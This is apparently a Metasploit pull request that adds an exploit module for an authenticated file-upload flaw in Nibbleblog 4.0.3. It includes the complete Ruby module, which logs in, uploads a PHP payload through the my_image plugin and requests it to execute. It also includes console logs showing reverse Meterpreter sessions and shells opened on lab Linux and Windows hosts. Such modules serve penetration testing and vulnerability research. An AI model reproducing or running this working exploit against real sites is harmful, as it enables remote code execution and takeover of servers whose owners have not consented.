### PR TITLE
Add Nibbleblog File Upload Vuln

### DIFF
--- a/modules/exploits/multi/http/nibbleblog_file_upload.rb
+++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb
@@ -45,24 +45,32 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class)
   end
 
-  def check
-    res = send_request_cgi(
-      'method'      => 'GET',
-      'uri'         => normalize_uri(target_uri.path, 'admin.php')
-    )
-
-    if res && res.code == 200 && res.body.include?('Sign in to Nibbleblog admin area')
-      return Exploit::CheckCode::Appears
-    end
-    Exploit::CheckCode::Safe
-  end
-
   def username
     datastore['USERNAME']
   end
 
   def password
     datastore['PASSWORD']
+  end
+
+  def check
+    cookie = do_login(username, password)
+    return Exploit::CheckCode::Detected unless cookie
+
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri.path, 'admin.php'),
+      'cookie'      => cookie,
+      'vars_get'    => {
+        'controller'  => 'settings',
+        'action'      => 'general'
+      }
+    )
+
+    if res && res.code == 200 && res.body.include?('Nibbleblog 4.0.3 "Coffee"')
+      return Exploit::CheckCode::Vulnerable
+    end
+    Exploit::CheckCode::Safe
   end
 
   def do_login(user, pass)

--- a/modules/exploits/multi/http/nibbleblog_file_upload.rb
+++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb
@@ -1,0 +1,143 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'Nibbleblog File Upload Vulnerability',
+      'Description'     => %q{
+          Nibbleblog contains a flaw that allows a authenticated remote
+          attacker to execute arbitrary PHP code. This module was
+          tested on version 4.0.3.
+        },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'To do', # Vulnerability Disclosure
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
+        ],
+      'References'      =>
+        [
+          ['URL', 'http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html']
+        ],
+      'DisclosureDate'  => 'Sep 01 2015',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['Nibbleblog 4.0.3', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI',  [true, 'The base path to the web application', '/']),
+        OptString.new('USERNAME',   [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD',   [true, 'The password to authenticate with'])
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri.path, 'admin.php')
+    )
+
+    if res && res.code == 200 && res.body.include?('Sign in to Nibbleblog admin area')
+      return Exploit::CheckCode::Appears
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def do_login(user, pass)
+    res = send_request_cgi(
+      'method'      => 'GET',
+      'uri'         => normalize_uri(target_uri.path, 'admin.php')
+    )
+
+    fail_with(Failure::Unreachable, 'No response received from the target.') unless res
+
+    session_cookie = res.get_cookies
+    vprint_status("#{peer} - Logging in...")
+    res = send_request_cgi(
+      'method'      => 'POST',
+      'uri'         => normalize_uri(target_uri.path, 'admin.php'),
+      'cookie'      => session_cookie,
+      'vars_post'   => {
+        'username'  => user,
+        'password'  => pass
+      }
+    )
+
+    return session_cookie if res && res.code == 302 && res.headers['Location']
+    nil
+  end
+
+  def exploit
+    vprint_status("#{peer} - Authenticating using #{username}:#{password}")
+
+    cookie = do_login(username, password)
+    fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
+    vprint_good("#{peer} - Authenticated with Nibbleblog.")
+
+    vprint_status("#{peer} - Preparing payload...")
+    payload_name = "#{Rex::Text.rand_text_alpha_lower(10)}.php"
+
+    data = Rex::MIME::Message.new
+    data.add_part('my_image', nil, nil, 'form-data; name="plugin"')
+    data.add_part('My image', nil, nil, 'form-data; name="title"')
+    data.add_part('4', nil, nil, 'form-data; name="position"')
+    data.add_part('', nil, nil, 'form-data; name="caption"')
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"image\"; filename=\"#{payload_name}\"")
+    data.add_part('1', nil, nil, 'form-data; name="image_resize"')
+    data.add_part('230', nil, nil, 'form-data; name="image_width"')
+    data.add_part('200', nil, nil, 'form-data; name="image_height"')
+    data.add_part('auto', nil, nil, 'form-data; name="image_option"')
+    post_data = data.to_s
+
+    vprint_status("#{peer} - Uploading payload...")
+    res = send_request_cgi(
+      'method'        => 'POST',
+      'uri'           => normalize_uri(target_uri, 'admin.php'),
+      'vars_get'      => {
+        'controller'  => 'plugins',
+        'action'      => 'config',
+        'plugin'      => 'my_image'
+      },
+      'ctype'         => "multipart/form-data; boundary=#{data.bound}",
+      'data'          => post_data,
+      'cookie'        => cookie
+    )
+
+    fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 200 &&
+      (res.body.include?('<b>Warning</b>') || res.body.include?('warn'))
+    vprint_good("#{peer} - Uploaded the payload.")
+
+    php_fname = 'image.php'
+    payload_url = normalize_uri(target_uri.path, 'content', 'private', 'plugins', 'my_image', php_fname)
+    vprint_status("#{peer} - Parsed response.")
+
+    register_files_for_cleanup(php_fname)
+    vprint_status("#{peer} - Executing the payload at #{payload_url}.")
+    send_request_cgi(
+      'uri'     => payload_url,
+      'method'  => 'GET'
+    )
+  end
+end

--- a/modules/exploits/multi/http/nibbleblog_file_upload.rb
+++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
-          'To do', # Vulnerability Disclosure
+          'Unknown', # Vulnerability Disclosure - Curesec Research Team. Author's name?
           'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
         ],
       'References'      =>


### PR DESCRIPTION
#### Add Nibbleblog File Upload Vulnerability.

  Application: Nibbleblog 4.0.3
  Homepage: http://www.nibbleblog.com
  Source Code: http://sourceforge.net/projects/nibbleblog/files/v4.0/nibbleblog-v4.0.3.zip
  References: http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html

  Install:
      1. Download the Nibbleblog 4.0.3 version from source code above.
      2. Unzip the downloaded file.
      3. Upload all files to your hosting or local server via FTP, Shell, Cpanel, others.
      4. With your browser, go to the URL of your web. Example: www.domain-name.com.
      5. Complete the form.
      6. Done! You have installed Nibbleblog.
#### Vulnerable packages*

  4.0.3
#### Usage:
##### Linux Ubuntu 12.04.5 LTS:

```
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf>  use exploit/multi/http/nibbleblog_file_upload 
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  set RHOST 10.10.10.20
RHOST => 10.10.10.20
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  set USERNAME espreto
USERNAME => espreto
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  set PASSWORD P@ssw0rd
PASSWORD => P@ssw0rd
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  set TARGETURI /nibbleblog
TARGETURI => /nibbleblog
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  check
[*] 10.10.10.20:80 - The target appears to be vulnerable.
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  exploit 

[*] Started reverse handler on 10.10.10.10:4444 
[*] Sending stage (32976 bytes) to 10.10.10.20
[*] Meterpreter session 1 opened (10.10.10.10:4444 -> 10.10.10.20:49201) at 2015-09-09 20:45:03 -0300
[+] Deleted image.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-62-generic #102~precise1-Ubuntu SMP Wed Aug 12 14:11:43 UTC 2015 i686
Meterpreter : php/php
meterpreter > shell
Process 8179 created.
Channel 0 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^Z
```
##### Windows 7 Ultimate Edition SP1 x86:

```
msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(nibbleblog_file_upload)  rexploit 
[*] Reloading module...

[*] Started reverse handler on 10.10.10.10:4444 
[*] Sending stage (32976 bytes) to 10.10.10.30
[*] Meterpreter session 4 opened (10.10.10.10:4444 -> 10.10.10.30:49255) at 2015-09-09 21:01:01 -0300
[+] Deleted image.php

meterpreter > sysinfo 
Computer    : WINBOX
OS          : Windows NT WINBOX 6.1 build 7601 (Windows 7 Ultimate Edition Service Pack 1) i586
Meterpreter : php/php
meterpreter > shell
Process 3440 created.
Channel 0 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\wamp\www\nibbleblog\content\private\plugins\my_image>
```
